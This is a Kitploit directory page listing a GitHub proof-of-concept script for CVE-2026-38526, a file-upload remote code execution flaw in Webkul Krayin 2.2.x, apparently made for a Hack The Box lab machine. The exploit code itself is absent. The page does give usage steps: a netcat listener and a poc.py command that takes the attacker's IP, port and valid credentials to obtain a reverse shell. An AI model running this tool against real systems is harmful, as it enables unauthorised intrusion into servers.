Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-38526-PoC-htb-nexus — A PoC script for CVE-2026-38526, RCE via a file upload vulnerability in the /admin/tinymce/upload endpoint of webkul krayin 2.2.x | Kitploit
Tools/GitHubGitHub/resolvdd/cve-2026-38526-poc-htb-nexus
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubresolvdd/cve-2026-38526-poc-htb-nexus

CVE-2026-38526-PoC-htb-nexus

A PoC script for CVE-2026-38526, RCE via a file upload vulnerability in the /admin/tinymce/upload endpoint of webkul krayin 2.2.x

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
View Repository
1 month agoNot yet reviewed
Share

CVE-2026-38526-PoC-htb-nexus

A PoC script for CVE-2026-38526, RCE via a file upload vulnerability in the /admin/tinymce/upload endpoint of webkul krayin 2.2.x (built for htb-nexus)

🛠 Quick start and Usage

  1. Clone the repository:
    root@kitploit:~
    git clone https://github.com/Resolvdd/CVE-2026-38526-PoC-htb-nexus.git
    cd CVE-2026-38526-PoC-htb-nexus
    
  2. Create a python venv:
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    
  3. Install requirements.txt:
    root@kitploit:~
    pip install -r requirements.txt
    
  4. Start listener:
    root@kitploit:~
    nc -lvnp <port number> (Default: 9001)
    
  5. Execute Script:
    root@kitploit:~
    python3 poc.py -i <your-ip> -p <listener-port-number> -e <valid-krayin-email> -P <valid-krayin-password> -u <url-excluding-protocol Default: http>
    
Download Tool